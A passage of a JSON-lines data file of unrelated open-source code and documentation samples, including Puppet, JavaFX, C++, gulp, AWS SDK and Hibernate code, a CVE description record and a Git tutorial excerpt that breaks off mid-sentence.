regsubst($ipaddress,'^(\\\\d+)\\\\.(\\\\d+)\\\\.(\\\\d+)\\\\.(\\\\d+)$','\\\\3')\n#\n# @example Put angle brackets around each octet in the node's IP address:\n# $x = regsubst($ipaddress, /([0-9]+)/, '<\\\\1>', 'G')\n#\nPuppet::Functions.create_function(:regsubst) do\n dispatch :regsubst_string do\n param 'Variant[Array[String],String]', :target\n param 'String', :pattern\n param 'Variant[String,Hash[String,String]]', :replacement\n optional_param 'Optional[Pattern[/^[GEIM]*$/]]', :flags\n optional_param \"Enum['N','E','S','U']\", :encoding\n end\n\n dispatch :regsubst_regexp do\n param 'Variant[Array[String],String]', :target\n param 'Variant[Regexp,Type[Regexp]]', :pattern\n param 'Variant[String,Hash[String,String]]', :replacement\n optional_param 'Pattern[/^G?$/]', :flags\n end\n\n def regsubst_string(target, pattern, replacement, flags = nil, encoding = nil)\n re_flags = 0\n operation = :sub\n if !flags.nil?\n flags.split(//).each do |f|\n case f\n when 'G' then operation = :gsub\n when 'E' then re_flags |= Regexp::EXTENDED\n when 'I' then re_flags |= Regexp::IGNORECASE\n when 'M' then re_flags |= Regexp::MULTILINE\n end\n end\n end\n inner_regsubst(target, Regexp.compile(pattern, re_flags, encoding), replacement, operation)\n end\n\n def regsubst_regexp(target, pattern, replacement, flags = nil)\n pattern = (pattern.pattern || '') if pattern.is_a?(Puppet::Pops::Types::PRegexpType)\n inner_regsubst(target, pattern, replacement, operation = flags == 'G' ? :gsub : :sub)\n end\n\n def inner_regsubst(target, re, replacement, op)\n target.respond_to?(op) ? target.send(op, re, replacement) : target.collect { |e| e.send(op, re, replacement) }\n end\n private :inner_regsubst\nend\n"} {"text": "\"\"\"\nLaunchpad OpenId backend\n\"\"\"\n\nfrom .open_id import OpenIdAuth\n\n\nclass LaunchpadOpenId(OpenIdAuth):\n name = 'launchpad'\n URL = 'https://login.launchpad.net'\n USERNAME_KEY = 'nickname'\n"} {"text": "\n\n## Part 5: Defining Type Systems\n\nIn this part of the tutorial we will show that defining type systems for\nlanguages is essentially no different from defining semantics. The major\ndifference is that programs and fragments of programs now rewrite to their\ntypes, instead of to concrete values. In terms of K, we will learn how\nto use it for a certain particular but important kind of applications.\n"} {"text": "/*\n * Copyright (c) 2008, 2016, Oracle and/or its affiliates.\n * All rights reserved. Use is subject to license terms.\n *\n * This file is available and licensed under the following license:\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * - Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * - Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in\n * the documentation and/or other materials provided with the distribution.\n * - Neither the name of Oracle Corporation nor the names of its\n * contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\npackage ensemble.samples.animation.interpolator;\n\nimport javafx.animation.Interpolator;\nimport javafx.animation.KeyFrame;\nimport javafx.animation.KeyValue;\nimport javafx.animation.Timeline;\nimport javafx.application.Application;\nimport javafx.scene.Parent;\nimport javafx.scene.Scene;\nimport javafx.scene.effect.Lighting;\nimport javafx.scene.layout.Pane;\nimport javafx.scene.paint.Color;\nimport javafx.scene.shape.Circle;\nimport javafx.stage.Stage;\nimport javafx.util.Duration;\n\n/**\n * A sample that shows various types of interpolation between key frames in a\n * timeline. There are five circles, each animated with a different\n * interpolation method. The Linear interpolator is the default. Use the\n * controls to reduce opacity to zero for some circles to compare with others,\n * or change circle color to distinguish between individual interpolators.\n *\n * @sampleName Interpolator\n * @preview preview.png\n * @docUrl http://docs.oracle.com/javase/8/javafx/visual-effects-tutorial/animations.htm#JFXTE149 JavaFX Transitions & Animation\n * @playground - (name=\"LINEAR\")\n * @playground circle1.opacity (min=0, max=1)\n * @playground circle1.fill\n * @playground - (name=\"EASE_BOTH\")\n * @playground circle2.opacity (min=0, max=1)\n * @playground circle2.fill\n * @playground - (name=\"EASE_IN\")\n * @playground circle3.opacity (min=0, max=1)\n * @playground circle3.fill\n * @playground - (name=\"EASE_OUT\")\n * @playground circle4.opacity (min=0, max=1)\n * @playground circle4.fill\n * @playground - (name=\"SPLINE\")\n * @playground circle5.opacity (min=0, max=1)\n * @playground circle5.fill\n * @see javafx.animation.Interpolator\n * @see javafx.animation.KeyFrame\n * @see javafx.animation.KeyValue\n * @see javafx.animation.Timeline\n * @see javafx.util.Duration\n * @embedded\n *\n * @related /Graphics 2d/Bouncing Balls\n * @related /Graphics 2d/Display Shelf\n * @related /Scenegraph/Events/Key Stroke Motion\n * @related /Graphics 3d/Xylophone\n */\npublic class InterpolatorApp extends Application {\n\n private final Timeline timeline = new Timeline();\n private Circle circle1;\n private Circle circle2;\n private Circle circle3;\n private Circle circle4;\n private Circle circle5;\n\n public Parent createContent() {\n Pane root = new Pane();\n root.setPrefSize(245, 230);\n root.setMinSize(Pane.USE_PREF_SIZE, Pane.USE_PREF_SIZE);\n root.setMaxSize(Pane.USE_PREF_SIZE, Pane.USE_PREF_SIZE);\n\n // create circles by method createMovingCircle listed below\n // default interpolator\n circle1 = createMovingCircle(Interpolator.LINEAR,\n 1, 0.7, Color.RED);\n // circle slows down when reached both ends of trajectory\n circle2 = createMovingCircle(Interpolator.EASE_BOTH,\n 2, 0.45, Color.VIOLET);\n // circle slows down in the beginning of animation\n circle3 = createMovingCircle(Interpolator.EASE_IN,\n 3, 0.2, Color.BLUE);\n // circle slows down in the end of animation\n circle4 = createMovingCircle(Interpolator.EASE_OUT,\n 4, 0.35, Color.YELLOW);\n // one can define own behaviour of interpolator by spline method\n circle5 = createMovingCircle(Interpolator.SPLINE(0.5, 0.1, 0.1, 0.5),\n 5, 0.7, Color.GREEN);\n\n root.getChildren().addAll(circle1, circle2, circle3, circle4, circle5);\n return root;\n }\n\n private Circle createMovingCircle(Interpolator interpolator, int which,\n double opacity, Color color) {\n // create a transparent circle\n Circle circle = new Circle(45, 45, 40, color);\n // set initial opacity\n circle.setOpacity(opacity);\n circle.setCenterY((which * 35) + 5);\n // add effect\n circle.setEffect(new Lighting());\n // create a timeline for moving the circle\n timeline.setCycleCount(Timeline.INDEFINITE);\n timeline.setAutoReverse(true);\n // create a keyValue for horizontal translation of circle to\n // the position 155px with given interpolator\n KeyValue keyValue = new KeyValue(circle.translateXProperty(), 155,\n interpolator);\n // create a keyFrame with duration 4s\n KeyFrame keyFrame = new KeyFrame(Duration.seconds(4), keyValue);\n // add the keyframe to the timeline\n timeline.getKeyFrames().add(keyFrame);\n return circle;\n }\n\n public void play() {\n timeline.play();\n }\n\n @Override\n public void stop() {\n timeline.stop();\n }\n\n @Override\n public void start(Stage primaryStage) throws Exception {\n primaryStage.setResizable(false);\n primaryStage.setScene(new Scene(createContent()));\n primaryStage.show();\n play();\n }\n\n /**\n * Java main for when running without JavaFX launcher\n * @param args command line arguments\n */\n public static void main(String[] args) {\n launch(args);\n }\n}\n"} {"text": "//=============================================================================\n// MusE\n// Linux Music Editor\n// $Id: stringparam.cpp,v 1.0.0.0 2010/04/24 01:01:01 terminator356 Exp $\n//\n// Copyright (C) 1999-2011 by Werner Schweer and others\n// String parameter module added by Tim.\n//\n// This program is free software; you can redistribute it and/or modify\n// it under the terms of the GNU General Public License\n// as published by the Free Software Foundation; version 2 of\n// the License, or (at your option) any later version.\n//\n// This program is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License\n// along with this program; if not, write to the Free Software\n// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n//=============================================================================\n\n#include \"stringparam.h\" \n#include \"xml.h\" \n\nnamespace MusECore {\n \n//---------------------------------------------------------\n// findKey\n//---------------------------------------------------------\n\niStringParamMap StringParamMap::findKey(const char* key)\n{\n iStringParamMap icm = find(std::string(key));\n return icm;\n}\n\n//---------------------------------------------------------\n// set\n//---------------------------------------------------------\n\nvoid StringParamMap::set(const char* key, const char* value)\n{\n iStringParamMap icm = find(std::string(key));\n if(icm == end())\n insert(std::pair(key, value));\n else\n icm->second = std::string(value); \n}\n\n//---------------------------------------------------------\n// remove\n//---------------------------------------------------------\n\nvoid StringParamMap::remove(const char* key)\n{\n erase(std::string(key));\n}\n\n//---------------------------------------------------------\n// read\n//---------------------------------------------------------\n\nvoid StringParamMap::read(Xml& xml, const QString& name)\n{\n QString n;\n QString value;\n \n for (;;) \n {\n Xml::Token token = xml.parse();\n const QString tag = xml.s1();\n switch (token) \n {\n case Xml::Error:\n case Xml::End:\n return;\n case Xml::TagStart:\n xml.unknown(name.toLatin1().constData());\n break;\n case Xml::Attribut:\n if(tag == \"name\") \n n = xml.s2();\n else\n if(tag == \"val\") \n value = xml.s2(); \n else\n xml.unknown(name.toLatin1().constData());\n break;\n case Xml::TagEnd:\n if(tag == name) \n {\n // Add or modify the item.\n set(n.toLatin1(), value.toLatin1());\n return;\n }\n default:\n break;\n }\n }\n}\n\n//---------------------------------------------------------\n// write\n//---------------------------------------------------------\n\nvoid StringParamMap::write(int level, Xml& xml, const char* name) const\n{\n if(empty())\n return;\n \n for(ciStringParamMap r = begin(); r != end(); ++r) \n xml.tag(level, \"%s name=\\\"%s\\\" val=\\\"%s\\\"/\", name, r->first.c_str(), r->second.c_str());\n}\n\n} // namespace MusECore\n"} {"text": "var gulp = require('gulp');\nvar sass = require('gulp-sass');\nvar autoprefixer = require('gulp-autoprefixer');\nvar sourcemaps = require('gulp-sourcemaps');\nvar cleanCSS = require('gulp-clean-css');\nvar rename = require('gulp-rename');\nvar include = require(\"gulp-include\");\nvar uglify = require('gulp-uglify');\nvar browserSync = require('browser-sync').create();\nvar reload = browserSync.reload;\nvar notify = require(\"gulp-notify\");\n\ngulp.task('sass', function () {\n return gulp.src('./assets/scss/landio.scss')\n .pipe(sourcemaps.init())\n .pipe(sass({ errLogToConsole: false, }))\n .on('error', function(err) {\n notify({\n \"sound\": \"Morse\"\n }).write(err);\n this.emit('end');\n })\n .pipe(autoprefixer({\n browsers: [\n \"Explorer >= 10\",\n \"iOS >= 9.3\", // Apple iPhone 5\n \"Android >= 5\"\n ]\n }))\n .pipe(cleanCSS())\n .pipe(rename({suffix: '.min'}))\n .pipe(sourcemaps.write('.'))\n .pipe(gulp.dest('./assets/css'))\n .pipe(browserSync.stream());\n});\n\ngulp.task('js', function() {\n return gulp.src('./assets/js/landio.js')\n .pipe(sourcemaps.init())\n .pipe(include())\n .on('error', console.log)\n .pipe(uglify())\n .pipe(rename({suffix: '.min'}))\n .pipe(sourcemaps.write('.'))\n .pipe(gulp.dest('./assets/js/'))\n .pipe(browserSync.stream());\n});\n\ngulp.task('serve', ['sass', 'js'], function() {\n browserSync.init({\n port: 3355,\n server: {\n baseDir: \"./\",\n index: \"index.html\",\n logSnippet: false\n }\n });\n\n gulp.watch('./assets/**/*.scss', ['sass']);\n gulp.watch('./assets/js/landio.js', ['js']);\n gulp.watch('./*.html').on('change', reload);\n});\n\ngulp.task('default', ['serve']);\n"} {"text": "#!/usr/bin/env bash\n#------------------------------------------------------------------------------\n# Bash+ - Modern Bash Programming\n#\n# Copyright (c) 2013 Ingy döt Net\n#------------------------------------------------------------------------------\n\nset -e\n\n#------------------------------------------------------------------------------\n# Determine how `bash+` was called, and do the right thing:\n#------------------------------------------------------------------------------\nif [ \"${BASH_SOURCE[0]}\" != \"$0\" ]; then\n # 'bash+' is being sourced:\n [[ \"${BASH_SOURCE[0]}\" =~ /bin/bash\\+$ ]] || {\n echo \"Invalid Bash+ path '${BASH_SOURCE[0]}'\" 2> /dev/null\n exit 1\n }\n source \"${BASH_SOURCE[0]%/bin/*}\"/lib/bash+.bash || return $?\n bash+:import \"$@\"\n return $?\nelse\n if [ $# -eq 1 -a \"$1\" == --version ]; then\n echo 'bash+ version 0.0.1'\n else\n cat <<...\n\nGreetings modern Bash programmer. Welcome to Bash+!\n\nBash+ is framework that makes Bash programming more like Ruby and Perl.\n\nSee: https://github.com/bpan-org/bashplus\n\nIf you got here trying to use bash+ in a program, you need to source it:\n\n source bash+\n\nHappy Bash Hacking!\n\n...\n fi\nfi\n"} {"text": "{\n \"name\": \"7.2.0 - Real-time Data Mart for AWS\",\n \"description\": \"\",\n \"type\": \"DATAMART\",\n \"featureState\": \"RELEASED\",\n \"cloudPlatform\": \"AWS\",\n \"distroXTemplate\": {\n \"cluster\": {\n \"blueprintName\": \"7.2.0 - Real-time Data Mart: Apache Impala, Hue, Apache Kudu, Apache Spark\"\n },\n \"instanceGroups\": [\n {\n \"name\": \"master1\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 1,\n \"size\": 100,\n \"type\": \"standard\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"r5.2xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 1,\n \"type\": \"GATEWAY\",\n \"recoveryMode\": \"MANUAL\"\n },\n {\n \"name\": \"master2\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 1,\n \"size\": 100,\n \"type\": \"standard\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"r5.2xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 1,\n \"type\": \"CORE\",\n \"recoveryMode\": \"MANUAL\"\n },\n {\n \"name\": \"master3\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 1,\n \"size\": 100,\n \"type\": \"standard\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"r5.2xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 1,\n \"type\": \"CORE\",\n \"recoveryMode\": \"MANUAL\"\n },\n {\n \"name\": \"coordinator\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 2,\n \"size\": 1900,\n \"type\": \"ephemeral\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"i3.4xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 1,\n \"type\": \"CORE\",\n \"recoveryMode\": \"MANUAL\"\n },\n {\n \"name\": \"executor\",\n \"template\": {\n \"attachedVolumes\": [\n {\n \"count\": 2,\n \"size\": 1900,\n \"type\": \"ephemeral\"\n }\n ],\n \"aws\": {\n \"encryption\": {\n \"type\": \"NONE\"\n }\n },\n \"instanceType\": \"i3.4xlarge\",\n \"rootVolume\": {\n \"size\": 50\n }\n },\n \"nodeCount\": 3,\n \"type\": \"CORE\",\n \"recoveryMode\": \"MANUAL\"\n }\n ]\n }\n}\n"} {"text": "{\n \"CVE_data_meta\": {\n \"ASSIGNER\": \"cve@mitre.org\",\n \"ID\": \"CVE-2002-1522\",\n \"STATE\": \"PUBLIC\"\n },\n \"affects\": {\n \"vendor\": {\n \"vendor_data\": [\n {\n \"product\": {\n \"product_data\": [\n {\n \"product_name\": \"n/a\",\n \"version\": {\n \"version_data\": [\n {\n \"version_value\": \"n/a\"\n }\n ]\n }\n }\n ]\n },\n \"vendor_name\": \"n/a\"\n }\n ]\n }\n },\n \"data_format\": \"MITRE\",\n \"data_type\": \"CVE\",\n \"data_version\": \"4.0\",\n \"description\": {\n \"description_data\": [\n {\n \"lang\": \"eng\",\n \"value\": \"Buffer overflow in PowerFTP FTP server 2.24, and possibly other versions, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long USER argument.\"\n }\n ]\n },\n \"problemtype\": {\n \"problemtype_data\": [\n {\n \"description\": [\n {\n \"lang\": \"eng\",\n \"value\": \"n/a\"\n }\n ]\n }\n ]\n },\n \"references\": {\n \"reference_data\": [\n {\n \"name\": \"20021005 Vulnerabilitie in PowerFTP server\",\n \"refsource\": \"BUGTRAQ\",\n \"url\": \"http://archives.neohapsis.com/archives/bugtraq/2002-10/0075.html\"\n },\n {\n \"name\": \"5899\",\n \"refsource\": \"BID\",\n \"url\": \"http://www.securityfocus.com/bid/5899\"\n },\n {\n \"name\": \"20021012 Coolsoft PowerFTP <= v2.24 Denial of Service (Linux Source)\",\n \"refsource\": \"BUGTRAQ\",\n \"url\": \"http://archives.neohapsis.com/archives/bugtraq/2002-10/0194.html\"\n },\n {\n \"name\": \"powerftp-long-username-dos(10286)\",\n \"refsource\": \"XF\",\n \"url\": \"http://www.iss.net/security_center/static/10286.php\"\n }\n ]\n }\n}"} {"text": "\n \n \n \n \n OpenStreetMap- default options\n \n \n \n \n\n@model OSMWeb.Models.OsmConfig\n@{\n ViewBag.Title = \"Create\";\n}\n\n
\n

Create new Feature Service

\n
@Html.ActionLink(\"< Back to list\", \"Index\")
\n
\n\n@using (Html.BeginForm())\n{\n @Html.ValidationSummary(true)\n\n @Html.Partial(\"_CreateOrEdit\", Model)\n\n
\n

What

\n\n
Zoom and pan the map to the area for which you want to retrieve data from OpenStreetMap. More data takes longer to download.
\n
\n \n
\n \n
\n @Html.LabelFor(model => model.Extent)\n
\n
\n @Html.TextBoxFor(model => model.Extent, new { style = \"width: 200px\" })\n @Html.ValidationMessageFor(model => model.Extent)\n
\n
\n\n \n
\n

How

\n
\n What should the service be named? What data should be symbolized (using the template dropdown below)? Do you want to synchronize with OpenStreetMap?\n
\n\n
\n @Html.LabelFor(model => model.FeatureDataSet)\n
\n
\n @Html.EditorFor(model => model.FeatureDataSet)\n @Html.ValidationMessageFor(model => model.FeatureDataSet)\n
\n
\n @Html.LabelFor(model => model.MxdTemplate)\n
\n
\n @{\n var mxdList = @ViewBag.mxdList as IEnumerable;\n }\n @Html.DropDownListFor(model => model.MxdTemplate, mxdList)\n
\n\n
\n Synchronize with OpenStreetMap?\n
\n
\n \n
\n @Html.LabelFor(model => model.Username)\n
\n
\n @Html.EditorFor(model => model.Username)\n @Html.ValidationMessageFor(model => model.Username)\n
\n
\n @Html.LabelFor(model => model.Password)\n
\n
\n @Html.PasswordFor(model => model.Password)\n @Html.ValidationMessageFor(model => model.Password)\n
\n
\n @ViewBag.AlphaCheck\n
\n\n
\n @Html.LabelFor(model => model.RefreshInterval)\n
\n
\n @{ var refreshList = @ViewBag.refreshList as IEnumerable;\n }\n @Html.DropDownListFor(model => model.RefreshInterval, refreshList)\n
\n\n
\n\n
\n @*Make sure this return true makes a request and postback on all browsers*@\n
\n \n
\n
\n @Html.ActionLink(\"Cancel\", \"Index\")\n
\n
\n @**@\n
\n\n
\n \n}\n\n
"} {"text": "import { ServiceInputTypes, ServiceOutputTypes, WorkLinkClientResolvedConfig } from \"../WorkLinkClient\";\nimport { UntagResourceRequest, UntagResourceResponse } from \"../models/models_0\";\nimport {\n deserializeAws_restJson1UntagResourceCommand,\n serializeAws_restJson1UntagResourceCommand,\n} from \"../protocols/Aws_restJson1\";\nimport { getSerdePlugin } from \"@aws-sdk/middleware-serde\";\nimport { HttpRequest as __HttpRequest, HttpResponse as __HttpResponse } from \"@aws-sdk/protocol-http\";\nimport { Command as $Command } from \"@aws-sdk/smithy-client\";\nimport {\n FinalizeHandlerArguments,\n Handler,\n HandlerExecutionContext,\n MiddlewareStack,\n HttpHandlerOptions as __HttpHandlerOptions,\n MetadataBearer as __MetadataBearer,\n SerdeContext as __SerdeContext,\n} from \"@aws-sdk/types\";\n\nexport type UntagResourceCommandInput = UntagResourceRequest;\nexport type UntagResourceCommandOutput = UntagResourceResponse & __MetadataBearer;\n\nexport class UntagResourceCommand extends $Command<\n UntagResourceCommandInput,\n UntagResourceCommandOutput,\n WorkLinkClientResolvedConfig\n> {\n // Start section: command_properties\n // End section: command_properties\n\n constructor(readonly input: UntagResourceCommandInput) {\n // Start section: command_constructor\n super();\n // End section: command_constructor\n }\n\n resolveMiddleware(\n clientStack: MiddlewareStack,\n configuration: WorkLinkClientResolvedConfig,\n options?: __HttpHandlerOptions\n ): Handler {\n this.middlewareStack.use(getSerdePlugin(configuration, this.serialize, this.deserialize));\n\n const stack = clientStack.concat(this.middlewareStack);\n\n const { logger } = configuration;\n const handlerExecutionContext: HandlerExecutionContext = {\n logger,\n inputFilterSensitiveLog: UntagResourceRequest.filterSensitiveLog,\n outputFilterSensitiveLog: UntagResourceResponse.filterSensitiveLog,\n };\n const { requestHandler } = configuration;\n return stack.resolve(\n (request: FinalizeHandlerArguments) =>\n requestHandler.handle(request.request as __HttpRequest, options || {}),\n handlerExecutionContext\n );\n }\n\n private serialize(input: UntagResourceCommandInput, context: __SerdeContext): Promise<__HttpRequest> {\n return serializeAws_restJson1UntagResourceCommand(input, context);\n }\n\n private deserialize(output: __HttpResponse, context: __SerdeContext): Promise {\n return deserializeAws_restJson1UntagResourceCommand(output, context);\n }\n\n // Start section: command_body_extra\n // End section: command_body_extra\n}\n"} {"text": "//\n// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).\n//\n// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.\n//\n\n#import \n\n#import \n\n@class NSString;\n@protocol OS_os_transaction;\n\n@interface PFLoggerBackendAdapter : NSObject \n{\n // Error parsing type: AQ, name: _pendingTransactionCount\n NSObject *_transaction;\n BOOL _runningUnderDebugger;\n}\n\n+ (long long)parseByteSizeValueForKey:(id)arg1 inString:(id)arg2;\n+ (long long)allFileSizeMaxBytesFromString:(id)arg1;\n+ (long long)fileSizeMaxBytesFromString:(id)arg1;\n+ (id)pathWithoutParametersFromString:(id)arg1;\n+ (id)backendsFromUserDefaultsWithLogLevel:(int)arg1;\n- (void).cxx_destruct;\n@property BOOL runningUnderDebugger; // @synthesize runningUnderDebugger=_runningUnderDebugger;\n- (void)flushWithCompletionHandler:(CDUnknownBlockType)arg1;\n@property(readonly, nonatomic) BOOL outputsToDebuggerConsole;\n@property(readonly, nonatomic) BOOL formatsMessage;\n@property(readonly, nonatomic) BOOL allowsConcurrentAccess;\n- (void)endTransaction;\n- (void)beginTransaction;\n- (void)logFromCodeLocation:(CDStruct_98c8119d)arg1 facility:(id)arg2 subsystem:(id)arg3 level:(int)arg4 message:(id)arg5 format:(id)arg6 args:(struct __va_list_tag [1])arg7;\n- (id)init;\n\n// Remaining properties\n@property(readonly, copy) NSString *debugDescription;\n@property(readonly, copy) NSString *description;\n@property(readonly) unsigned long long hash;\n@property(readonly) Class superclass;\n\n@end\n\n"} {"text": "package tech.wetech.weshop.common.exception;\n\nimport tech.wetech.weshop.common.utils.ResultStatus;\n\npublic class WeshopException extends RuntimeException {\n\n ResultStatus status;\n\n\tpublic WeshopException(ResultStatus status) {\n //不生成栈追踪信息\n super(status.getMsg(), null, false, false);\n this.status = status;\n }\n\n public ResultStatus getStatus() {\n return status;\n }\n\n public void setStatus(ResultStatus status) {\n this.status = status;\n }\n}\n"} {"text": "/*\n * Hibernate, Relational Persistence for Idiomatic Java\n *\n * License: GNU Lesser General Public License (LGPL), version 2.1 or later.\n * See the lgpl.txt file in the root directory or .\n */\npackage org.hibernate.engine.jdbc.dialect.internal;\n\nimport org.hibernate.dialect.Database;\nimport org.hibernate.dialect.Dialect;\nimport org.hibernate.engine.jdbc.dialect.spi.DialectResolutionInfo;\nimport org.hibernate.engine.jdbc.dialect.spi.DialectResolver;\n\n/**\n * The standard DialectResolver implementation\n *\n * @author Steve Ebersole\n */\npublic final class StandardDialectResolver implements DialectResolver {\n\n\t@Override\n\tpublic Dialect resolveDialect(DialectResolutionInfo info) {\n\n\t\tfor ( Database database : Database.values() ) {\n\t\t\tDialect dialect = database.resolveDialect( info );\n\t\t\tif ( dialect != null ) {\n\t\t\t\treturn dialect;\n\t\t\t}\n\t\t}\n\n\t\treturn null;\n\t}\n}\n"} {"text": "#region Copyright (C) 2007-2018 Team MediaPortal\n\n/*\n Copyright (C) 2007-2018 Team MediaPortal\n http://www.team-mediaportal.com\n\n This file is part of MediaPortal 2\n\n MediaPortal 2 is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n MediaPortal 2 is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with MediaPortal 2. If not, see .\n*/\n\n#endregion\n\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Threading.Tasks;\nusing MediaPortal.Common;\nusing MediaPortal.Common.MediaManagement;\nusing MediaPortal.Common.SystemCommunication;\n\nnamespace MediaPortal.DevTools\n{\n /// \n /// Media item aspect type registration class for the MediaPortal client. Stores all registered media item aspect types\n /// and automatically registers them at the connected server.\n /// \n public class MediaItemAspectTypeRegistration : IMediaItemAspectTypeRegistration\n {\n protected IDictionary _locallyKnownMediaItemAspectTypes = new Dictionary();\n protected IDictionary _locallySupportedReimportMediaItemAspectTypes = new Dictionary();\n\n public IDictionary LocallyKnownMediaItemAspectTypes\n {\n get { return _locallyKnownMediaItemAspectTypes; }\n }\n\n public IDictionary LocallySupportedReimportMediaItemAspectTypes\n {\n get { return _locallySupportedReimportMediaItemAspectTypes; }\n }\n\n public async Task RegisterLocallyKnownMediaItemAspectTypeAsync(IEnumerable miaTypes)\n {\n await Task.WhenAll(miaTypes.Select(RegisterLocallyKnownMediaItemAspectTypeAsync));\n }\n\n public Task RegisterLocallyKnownMediaItemAspectTypeAsync(MediaItemAspectMetadata miaType)\n {\n if (_locallyKnownMediaItemAspectTypes.ContainsKey(miaType.AspectId))\n return Task.CompletedTask;\n _locallyKnownMediaItemAspectTypes.Add(miaType.AspectId, miaType);\n IServerConnectionManager serverConnectionManager = ServiceRegistration.Get();\n IContentDirectory cd = serverConnectionManager == null ? null :\n serverConnectionManager.ContentDirectory;\n if (cd != null)\n cd.AddMediaItemAspectStorageAsync(miaType).Wait();\n return Task.CompletedTask;\n }\n\n public Task RegisterLocallySupportedReimportMediaItemAspectTypeAsync(MediaItemAspectMetadata miaType)\n {\n Console.WriteLine(\"Registering reimport support \" + miaType.Name);\n if (!_locallySupportedReimportMediaItemAspectTypes.ContainsKey(miaType.AspectId))\n _locallySupportedReimportMediaItemAspectTypes.Add(miaType.AspectId, miaType);\n return Task.CompletedTask;\n }\n }\n}\n"} {"text": "(function() {\n 'use strict';\n\n angular\n .module('erpApp')\n .config(stateConfig);\n\n stateConfig.$inject = ['$stateProvider'];\n\n function stateConfig($stateProvider) {\n $stateProvider.state('jhi-health', {\n parent: 'admin',\n url: '/health',\n data: {\n authorities: ['ROLE_ADMIN'],\n pageTitle: 'health.title'\n },\n views: {\n 'content@app': {\n templateUrl: 'app/admin/health/health.html',\n controller: 'JhiHealthCheckController',\n controllerAs: 'vm'\n }\n },\n resolve: {\n translatePartialLoader: ['$translate', '$translatePartialLoader', function ($translate, $translatePartialLoader) {\n $translatePartialLoader.addPart('health');\n return $translate.refresh();\n }]\n }\n });\n }\n})();\n"} {"text": "---\ntitle: Exploring History\nteaching: 25\nexercises: 0\nquestions:\n- \"How can I identify old versions of files?\"\n- \"How do I review my changes?\"\n- \"How can I recover old versions of files?\"\nobjectives:\n- \"Explain what the HEAD of a repository is and how to use it.\"\n- \"Identify and use Git commit numbers.\"\n- \"Compare various versions of tracked files.\"\n- \"Restore old versions of files.\"\nkeypoints:\n- \"`git diff` displays differences between commits.\"\n- \"`git checkout` recovers old versions of files.\"\n---\n\nAs we saw in the previous lesson, we can refer to commits by their\nidentifiers. You can refer to the _most recent commit_ of the working\ndirectory by using the identifier `HEAD`.\n\nWe've been adding one line at a time to `mars.txt`, so it's easy to track our\nprogress by looking, so let's do that using our `HEAD`s. Before we start,\nlet's make a change to `mars.txt`, adding yet another line.\n\n~~~\n$ nano mars.txt\n$ cat mars.txt\n~~~\n{: .language-bash}\n\n~~~\nCold and dry, but everything is my favorite color\nThe two moons may be a problem for Wolfman\nBut the Mummy will appreciate the lack of humidity\nAn ill-considered change\n~~~\n{: .output}\n\nNow, let's see what we get.\n\n~~~\n$ git diff HEAD mars.txt\n~~~\n{: .language-bash}\n\n~~~\ndiff --git a/mars.txt b/mars.txt\nindex b36abfd..0848c8d 100644\n--- a/mars.txt\n+++ b/mars.txt\n@@ -1,3 +1,4 @@\n Cold and dry, but everything is my favorite color\n The two moons may be a problem for Wolfman\n But the Mummy will appreciate the lack of humidity\n+An ill-considered change.\n~~~\n{: .output}\n\nwhich is the same as what you would get if you leave out `HEAD` (try it). The\nreal goodness in all this is when you can 